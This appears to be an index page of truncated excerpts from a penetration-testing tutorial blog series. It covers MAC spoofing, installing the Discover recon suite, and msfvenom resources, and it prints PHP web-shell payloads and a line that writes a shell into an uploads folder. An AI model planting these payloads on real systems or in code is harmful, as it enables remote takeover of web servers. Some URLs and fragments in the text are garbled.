[ Pen Testing ] :: Step by Step: Changing Your MAC Address

macchanger

This is post 14 of 19 in the series “[ Pen Testing ]” Hide Your Ass, Change Your MAC Manually ifconfig wlan0 down ifconfig ​wlan0 hw ether f1:a7:12:34:1b:c1 ifconfig wlan0 up With macchanger ifconfig wlan0 down # print your MAC macchanger -s wlan0​ # set your MAC macchanger -m 11:22:33:44:55:66 wlan0 # set to a …

[ Pen Testing ] :: Step by Step: Lee Baird’s Discover Suite

Lee Baird's Discover

This is post 13 of 19 in the series “[ Pen Testing ]”   # Install Lee Baird’s Discover, a huge and golden # master collection: cd /opt git clone https://github.com/leebaird/discover.git cd /discover ./update.sh http://www.thegeeky.space/2015/04/how-to-save-time-doing-passive-discovery-in-Kali-Linux-using-discover-or-backtrack-script-framework.html https://www.youtube.com/watch?v=BovrxSpZpQI sss zzzz

[ Pen Testing ] :: Step by Step: Resource Links

This is post 12 of 19 in the series “[ Pen Testing ]” There is a ton of stuff on these pages and sites, to much to catalog at the moment. But when I’m looking for an exploit or payload, these are the kinds of places I dig. How to use msfvenom: https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom “Complete Howto …

[ Pen Testing ] :: Step by Step: msfvenom

This is post 10 of 19 in the series “[ Pen Testing ]” Msfvenom creates shellcode from within Bash. Here is Rapid7’s own excellent documentation: https://github.com/rapid7/metasploit-fraamework/wiki/How-to-use-msfvenom “Complete How to Guide for MSFvenom”: https://securitytraning.com/complete-guide-msfvenom/ And a good thorough walk-through (in Spanish, but with regular English command examples): https://www.hackplayers.com/2018/05/recopilacion-shells-en-windows.html Open Bash and enter: msfvenom to get a …

[ Pen Testing ] :: Step by Step: Remote Code Execution (RCE)

Glenn Norman hacking

This is post 9 of 19 in the series “[ Pen Testing ]” Remote Code Execution RCE PHP RCE Test a form for vulnerability to PHP RCE: <?php phpinfo(); ?> Get a remote PHP shell: <?php system($_GET[“c”]); ?> <?php `$_GET[“c”]`; ?> Upload a file: <?php file_put_contents(‘/var/www/html/uploads/test.php’, ‘<?php system($_GET[“c”]);?>’); ?> Evade file-type upload filters using rot13 …